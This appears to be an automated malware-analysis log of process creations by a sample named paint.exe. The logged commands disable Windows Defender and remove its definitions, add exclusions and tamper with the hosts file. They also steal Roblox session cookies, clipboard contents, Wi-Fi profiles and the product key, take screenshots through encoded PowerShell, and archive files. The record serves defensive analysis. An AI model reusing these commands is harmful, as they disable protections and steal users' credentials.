              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\paint.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaag